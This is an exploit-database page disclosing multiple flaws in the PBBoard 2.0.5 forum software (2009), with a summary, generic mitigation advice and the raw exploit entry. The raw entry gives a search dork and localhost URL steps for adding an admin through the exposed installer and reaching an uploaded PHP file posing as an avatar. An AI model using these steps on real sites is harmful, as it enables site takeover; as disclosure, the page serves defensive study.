header-logo
Suggest Exploit
vendor:
PBBoard
by:
indoushka
9,3
CVSS
HIGH
Multiple Vulnerabilities
264, 434, 22
CWE
Product Name: PBBoard
Affected Version From: 2.0.5
Affected Version To: 2.0.5
Patch Exists: YES
Related CWE: N/A
CPE: a:pbboard:pbboard:2.0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

PBBoard Version 2.0.5 Mullti Vulnerability

PBBoard Version 2.0.5 is vulnerable to multiple vulnerabilities, including an Add Admin vulnerability, an upload vulnerability, and a file inclusion vulnerability. The Add Admin vulnerability allows an attacker to add an admin user to the system. The upload vulnerability allows an attacker to upload malicious files to the system. The file inclusion vulnerability allows an attacker to include malicious files from the system.

Mitigation:

Ensure that all user input is properly validated and sanitized. Ensure that all uploaded files are properly validated and sanitized. Ensure that all file inclusion requests are properly validated and sanitized.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : PBBoard Version 2.0.5 Mullti Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iq-ty.com                                                                     
| # Web Site : http://www.pbboard.com/PBBoard_v2.0.5.zip                                                    
| # Dork     : Powered by PBBoard© 2009 Version 2.0.5                                                                                                               
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Mullti                                                                    
======================      Exploit By indoushka       =================================
# Exploit  :  
 
1- Add Admin:

http://127.0.0.1/upload/setup/install/?step=4

2- upload Vulnerability:

Fter register go to

http://127.0.0.1/upload/index.php?page=usercp&control=1&avatar=1&main=1

After Upload go to 2 find 

http://127.0.0.1/Upload/download/avatar/(Ev!l name.php)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net 
www.alkrsan.net * www.kadmiwe.net * www.arhack.net   
--------------------------------------------------------------------------------------------------------------